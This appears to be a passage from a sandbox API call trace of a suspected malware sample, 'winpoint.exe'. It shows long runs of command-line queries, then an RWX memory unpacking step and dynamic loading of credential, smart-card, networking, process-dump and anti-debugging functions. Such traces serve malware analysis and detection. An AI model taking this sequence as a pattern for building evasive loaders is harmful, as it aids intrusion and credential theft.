returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.653] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.654] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.655] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.659] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.660] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.661] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.661] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.661] GlobalReAlloc (hMem=0x639470, dwBytes=0x6, uFlags=0x0) returned 0x639470 [0161.661] GlobalSize (hMem=0x639470) returned 0x6 [0161.661] GetTickCount () returned 0x309cf [0161.661] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76780000 
[0161.661] GetProcAddress (hModule=0x76780000, lpProcName="GetWindowContextHelpId") returned 0x767d9cac [0161.707] GetWindowContextHelpId (param_1=0x0) returned 0x0 [0161.777] GetLastError () returned 0x578 [0161.777] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa8 [0161.777] VirtualAlloc (lpAddress=0x0, dwSize=0xd20, flAllocationType=0x3000, flProtect=0x40) returned 0x2e0000 [0161.778] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualAlloc") returned 0x75ca1856 [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualProtect") returned 0x75ca435f [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryA") returned 0x75ca49d7 [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualFree") returned 0x75ca186e [0161.778] GetProcAddress (hModule=0x75c90000, lpProcName="VirtualQuery") returned 0x75ca445a [0161.778] VirtualQuery (in: lpAddress=0x484bfb, lpBuffer=0x18fc10, dwLength=0x1c | out: lpBuffer=0x18fc10*(BaseAddress=0x484000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x33000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0161.778] VirtualAlloc (lpAddress=0x0, dwSize=0x837e8, flAllocationType=0x3000, flProtect=0x4) returned 0x4c0000 [0161.778] VirtualAlloc (lpAddress=0x0, dwSize=0xaa200, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0161.819] VirtualFree (lpAddress=0x4c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.821] VirtualProtect (in: lpAddress=0x400000, dwSize=0xb6000, flNewProtect=0x40, lpflOldProtect=0x18fc0c | out: lpflOldProtect=0x18fc0c*=0x2) returned 1 [0161.847] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x751e0000 [0162.202] GetProcAddress (hModule=0x751e0000, lpProcName="FreeContextBuffer") returned 0x758a9606 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="QuerySecurityPackageInfoW") returned 0x758b0d6b [0162.203] 
GetProcAddress (hModule=0x751e0000, lpProcName="AcquireCredentialsHandleW") returned 0x758b14f7 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="FreeCredentialsHandle") returned 0x758b0581 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="InitializeSecurityContextW") returned 0x758b1557 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="GetUserNameExW") returned 0x758aa415 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="GetUserNameExA") returned 0x758aa4e7 [0162.203] GetProcAddress (hModule=0x751e0000, lpProcName="CompleteAuthToken") returned 0x758b0dbd [0162.203] LoadLibraryA (lpLibFileName="WinSCard.dll") returned 0x75700000 [0162.203] GetProcAddress (hModule=0x75700000, lpProcName="SCardReleaseContext") returned 0x757085d3 [0162.203] GetProcAddress (hModule=0x75700000, lpProcName="SCardListReadersW") returned 0x7570bb33 [0162.204] GetProcAddress (hModule=0x75700000, lpProcName="SCardGetStatusChangeW") returned 0x7570c94b [0162.204] GetProcAddress (hModule=0x75700000, lpProcName="SCardEstablishContext") returned 0x7570459f [0162.204] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x778f0000 [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName=0x73) returned 0x778f3ab2 [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName=0x97) returned 0x778f6a8a [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName="WSAIoctl") returned 0x778f2fe7 [0162.206] GetProcAddress (hModule=0x778f0000, lpProcName=0x3) returned 0x778f3918 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x12) returned 0x778f6989 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName="getaddrinfo") returned 0x778f4296 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0xb) returned 0x778f311b [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x17) returned 0x778f3eb8 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x4) returned 0x778f6bdd [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x9) returned 
0x778f2d8b [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName="freeaddrinfo") returned 0x778f4b1b [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x15) returned 0x778f41b6 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x13) returned 0x778f6f01 [0162.207] GetProcAddress (hModule=0x778f0000, lpProcName=0x10) returned 0x778f6b0e [0162.208] GetProcAddress (hModule=0x778f0000, lpProcName=0xa) returned 0x778f3084 [0162.208] GetProcAddress (hModule=0x778f0000, lpProcName=0x6f) returned 0x778f37ad [0162.208] GetProcAddress (hModule=0x778f0000, lpProcName=0x74) returned 0x778f3c5f [0162.208] LoadLibraryA (lpLibFileName="USERENV.dll") returned 0x751c0000 [0162.212] GetProcAddress (hModule=0x751c0000, lpProcName="DestroyEnvironmentBlock") returned 0x751c1a4e [0162.212] GetProcAddress (hModule=0x751c0000, lpProcName="CreateEnvironmentBlock") returned 0x751c1a7a [0162.212] LoadLibraryA (lpLibFileName="dbghelp.dll") returned 0x750c0000 [0162.434] GetProcAddress (hModule=0x750c0000, lpProcName="MiniDumpWriteDump") returned 0x75105d38 [0162.434] LoadLibraryA (lpLibFileName="WTSAPI32.dll") returned 0x750a0000 [0162.659] GetProcAddress (hModule=0x750a0000, lpProcName="WTSEnumerateSessionsW") returned 0x750a1d49 [0162.659] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75a60000 [0162.659] GetProcAddress (hModule=0x75a60000, lpProcName="CoCreateInstance") returned 0x75aa9d0b [0162.659] GetProcAddress (hModule=0x75a60000, lpProcName="CoSetProxyBlanket") returned 0x75a75ea5 [0162.660] GetProcAddress (hModule=0x75a60000, lpProcName="CoInitializeSecurity") returned 0x75a87259 [0162.660] GetProcAddress (hModule=0x75a60000, lpProcName="CoInitializeEx") returned 0x75aa09ad [0162.660] GetProcAddress (hModule=0x75a60000, lpProcName="CoUninitialize") returned 0x75aa86d3 [0162.660] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75c90000 [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0162.660] 
GetProcAddress (hModule=0x75c90000, lpProcName="LeaveCriticalSection") returned 0x77d52270 [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="ResetEvent") returned 0x75ca16dd [0162.660] GetProcAddress (hModule=0x75c90000, lpProcName="Sleep") returned 0x75ca10ff [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="ReadFile") returned 0x75ca3ed3 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="CloseHandle") returned 0x75ca1410 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="PrepareTape") returned 0x75d2d232 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="EraseTape") returned 0x75d2d265 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="MulDiv") returned 0x75ca1b80 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="GetLocalTime") returned 0x75ca5aa6 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpW") returned 0x75ca5929 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcpyW") returned 0x75cc3102 [0162.661] GetProcAddress (hModule=0x75c90000, lpProcName="lstrlenW") returned 0x75ca1700 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="TlsFree") returned 0x75ca3587 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="CreateMutexA") returned 0x75ca4c6b [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryA") returned 0x75ca49d7 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileNameA") returned 0x75ca14b1 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleW") returned 0x75ca34b0 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="ExpandEnvironmentStringsA") returned 0x75cbeb39 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="FindAtomA") returned 0x75cbede4 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetProfileIntW") returned 0x75cc2a54 [0162.662] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemDirectoryA") returned 0x75cbb66c [0162.663] GetProcAddress 
(hModule=0x75c90000, lpProcName="GetCurrentDirectoryA") returned 0x75ccd4f6 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="CreateFileA") returned 0x75ca53c6 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesW") returned 0x75ca1b18 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetComputerNameA") returned 0x75cbb6e0 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetACP") returned 0x75ca179c [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetOEMCP") returned 0x75ccd1a1 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetDateFormatW") returned 0x75cc34d7 [0162.663] GetProcAddress (hModule=0x75c90000, lpProcName="GetThreadLocale") returned 0x75ca35cf [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="GenerateConsoleCtrlEvent") returned 0x75d47a5f [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75cc735f [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="Process32FirstW") returned 0x75cc8baf [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="Process32NextW") returned 0x75cc896c [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="MultiByteToWideChar") returned 0x75ca192e [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="WideCharToMultiByte") returned 0x75ca170d [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="SetLastError") returned 0x75ca11a9 [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="WriteFile") returned 0x75ca1282 [0162.664] GetProcAddress (hModule=0x75c90000, lpProcName="WaitForSingleObject") returned 0x75ca1136 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="CreateFileW") returned 0x75ca3f5c [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="GetCurrentThreadId") returned 0x75ca1450 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="GetSystemDirectoryW") returned 0x75ca5063 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="OpenProcess") 
returned 0x75ca1986 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcatW") returned 0x75cc828e [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryW") returned 0x75ca492b [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="FreeLibrary") returned 0x75ca34c8 [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="WaitNamedPipeW") returned 0x75d245df [0162.665] GetProcAddress (hModule=0x75c90000, lpProcName="GetExitCodeProcess") returned 0x75cb174d [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="GetTickCount") returned 0x75ca110c [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="GetVersionExW") returned 0x75ca1ae5 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="LocalFree") returned 0x75ca2d3c [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpiW") returned 0x75cbd5cd [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileNameW") returned 0x75ca4950 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="SizeofResource") returned 0x75ca5ac9 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="LoadResource") returned 0x75ca594c [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="FindResourceW") returned 0x75ca5971 [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="LoadLibraryExW") returned 0x75ca495d [0162.666] GetProcAddress (hModule=0x75c90000, lpProcName="CreateThread") returned 0x75ca34d5 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetCommandLineW") returned 0x75ca5223 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="ExpandEnvironmentStringsW") returned 0x75ca4173 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="InterlockedDecrement") returned 0x75ca13f0 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="CreatePipe") returned 0x75d2415b [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="PeekNamedPipe") returned 0x75d24821 [0162.667] GetProcAddress (hModule=0x75c90000, 
lpProcName="GetEnvironmentVariableA") returned 0x75ca33a0 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetTimeFormatA") returned 0x75cca842 [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="FreeResource") returned 0x75cbd3db [0162.667] GetProcAddress (hModule=0x75c90000, lpProcName="GetDateFormatA") returned 0x75cca959 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="MoveFileExW") returned 0x75cb9b2d [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="CreateProcessW") returned 0x75ca103d [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpA") returned 0x75cbeceb [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="lstrcmpiA") returned 0x75ca3e8e [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalAlloc") returned 0x75ca588e [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalLock") returned 0x75cbd0a7 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="InterlockedIncrement") returned 0x75ca1400 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GlobalUnlock") returned 0x75cbcfdf [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GetOverlappedResult") returned 0x75cbcc79 [0162.668] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileSizeEx") returned 0x75ca59e2 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="SetEndOfFile") returned 0x75cbce2e [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="DeleteFileW") returned 0x75ca89b3 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="MoveFileW") returned 0x75cb9af0 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="GetDriveTypeW") returned 0x75ca418b [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="SetFileTime") returned 0x75cbecbb [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="ProcessIdToSessionId") returned 0x75ca1275 [0162.669] GetProcAddress (hModule=0x75c90000, lpProcName="SleepEx") returned 0x75ca1215 [0162.669] GetProcAddress (hModule=0x75c90000, 
